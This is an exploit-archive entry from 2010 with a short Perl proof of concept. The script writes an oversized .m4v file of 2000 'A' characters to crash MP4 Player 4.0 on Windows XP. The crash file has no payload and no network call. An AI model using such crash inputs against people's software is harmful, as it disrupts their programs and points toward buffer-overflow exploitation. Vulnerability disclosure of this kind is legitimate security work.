id: 9822
date: 01/02/2010
title: MP4 Player 4.0 Local Crash Poc
author: sarbot511
cves: 

==============================
MP4 Player 4.0 Local Crash Poc
==============================

# Title: MP4 Player 4.0 Local Crash Poc
# CVE-ID: ()
# OSVDB-ID: ()
# Author: SarBoT511
# Published: 2010-01-02
# Verified: no

view source
print?
#!usr/bin/perl
#Exploits title :[MP4 Player 4.0 Local Crash Poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[http://mp4-player.ivefound.com/download/mp4PlayerSetup.exe]
#tested on :[win xp sp2]
#MP4 Player 4.0
#Greatz [2] :{ aB0 M0haM3d and lezr crew }
 
$file="SarBoT511.m4v";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";



#  0day.today [2023-03-22]  #